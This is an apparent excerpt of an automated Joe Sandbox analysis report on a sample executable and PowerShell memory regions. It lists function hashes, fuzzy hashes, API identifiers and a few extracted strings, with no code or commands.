                                                                • Opcode ID: d3b358ed62c6a033b7745128fd11dd1cfa4d6dbe723572bb53af89f39f3074c6
                                                                • Instruction ID: 599c47d309f9f278c556275727100eb7cd8ddbead7dd6ba1058d20813a7a504c
                                                                • Opcode Fuzzy Hash: d3b358ed62c6a033b7745128fd11dd1cfa4d6dbe723572bb53af89f39f3074c6
                                                                • Instruction Fuzzy Hash: 9312BF21A0CA82C5EB11CFA6E8402B977A1FF65784F44423AF94EC36A5EF3CE545C702

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                • String ID:
                                                                • API String ID: 1133592946-0
                                                                • Opcode ID: 1cbc0dcdf469d96383d55006a5203152253f0f20c1a05c1544fc42c63d5dbbda
                                                                • Instruction ID: c83f1681caf9755fb0c45573cdc18a4ad7bb87fee472957dda44d6c7026c225d
                                                                • Opcode Fuzzy Hash: 1cbc0dcdf469d96383d55006a5203152253f0f20c1a05c1544fc42c63d5dbbda
                                                                • Instruction Fuzzy Hash: 9E31F521A0CA03C1FB64ABE594113BA2391BFA6784F44443DFA4EC72A7DE3DE845C352

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: File$CloseHandle$View$CreateMappingUnmapmemmove$Size
                                                                • String ID: .ATOM$@
                                                                • API String ID: 446061512-930667443
                                                                • Opcode ID: 4db16023d56813c619b6a560a2264965fcc72533692b26ac0f32b99d66fa7c74
                                                                • Instruction ID: af3341138dc43da7c8443fe74f989aa07129c393b2203d139f497329a63ff46b
                                                                • Opcode Fuzzy Hash: 4db16023d56813c619b6a560a2264965fcc72533692b26ac0f32b99d66fa7c74
                                                                • Instruction Fuzzy Hash: E6815F72A19A42CAE750CF62E84066A73A0FF99B94F105239FA9DC3B94DF3CE455C701

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 313767242-0
                                                                • Opcode ID: efd1cfd97ab6ddbc734f1008b619de7ec29c4480cf9123f63dd80cdb39ef4dc1
                                                                • Instruction ID: 4eabad754478d5c0de5bd14b012c885ff5e9885b5ad3867b811f2c483b52f34a
                                                                • Opcode Fuzzy Hash: efd1cfd97ab6ddbc734f1008b619de7ec29c4480cf9123f63dd80cdb39ef4dc1
                                                                • Instruction Fuzzy Hash: 66310C72609B81CAEB609FA1E8803ED7364FB94744F44443EEA4E87B99DF38D548C711

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                • String ID:
                                                                • API String ID: 2933794660-0
                                                                • Opcode ID: d82abbdedb5a10bf1745d74c4b3cb6bc3aa2428d30236cd128df959476fd0043
                                                                • Instruction ID: bbfe6b5216773da170299ad4a6f53afca1be8fb93f395961f61e197a7d904d1a
                                                                • Opcode Fuzzy Hash: d82abbdedb5a10bf1745d74c4b3cb6bc3aa2428d30236cd128df959476fd0043
                                                                • Instruction Fuzzy Hash: D7111862B14F05CAEB008FA1EC542A933A4FB69758F441A39EA6D877A4DF78D198C341

                                                                APIs
                                                                • printf.MSPDB140-MSVCRT ref: 00007FF68EF314CD
                                                                  • Part of subcall function 00007FF68EF313F0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68EF31418
                                                                  • Part of subcall function 00007FF68EF313F0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68EF31437
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: __acrt_iob_func__stdio_common_vfprintfprintf
                                                                • String ID: [!] Please Input A Valid x64 Pe File !$[!] We Do Not Support Dll Files !$[!] We Do Not Support x32 Exe Files, Yet !
                                                                • API String ID: 115429112-3694449406
                                                                • Opcode ID: 9c66d0a18c6db04ca9e1ad55c47463c0ad7d98b22bcee0dad5a017a2a428367f
                                                                • Instruction ID: 1b8f9ee729517ccfdad8d61d1e06c756a0c9dc117670aa14013f43381d86cb76
                                                                • Opcode Fuzzy Hash: 9c66d0a18c6db04ca9e1ad55c47463c0ad7d98b22bcee0dad5a017a2a428367f
                                                                • Instruction Fuzzy Hash: 49F0FF15F04502C2EF98A78AD8522B52151FFB4740FC0403AF64EC32E2EE3CD996C712
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID: 6Z$0Wd
• API String ID: 0-1025847120
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3246615706.00007FF887A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 1A_L
• API String ID: 0-1522723599
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3246615706.00007FF887A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887a40000_powershell.jbxd
Similarity
• API ID:
• String ID: 1A_L
• API String ID: 0-1522723599
Memory Dump Source
• Source File: 0000000B.00000002.3246615706.00007FF887A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887a40000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID: (0w$8,w$H1w$P/w$p0w$-w$/w
• API String ID: 0-3134464491
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3245897971.00007FF887970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff887970000_powershell.jbxd
Similarity
• API ID:
• String ID: ":$#:$=M_^$M_^$M_^ $M_^$
• API String ID: 0-437579093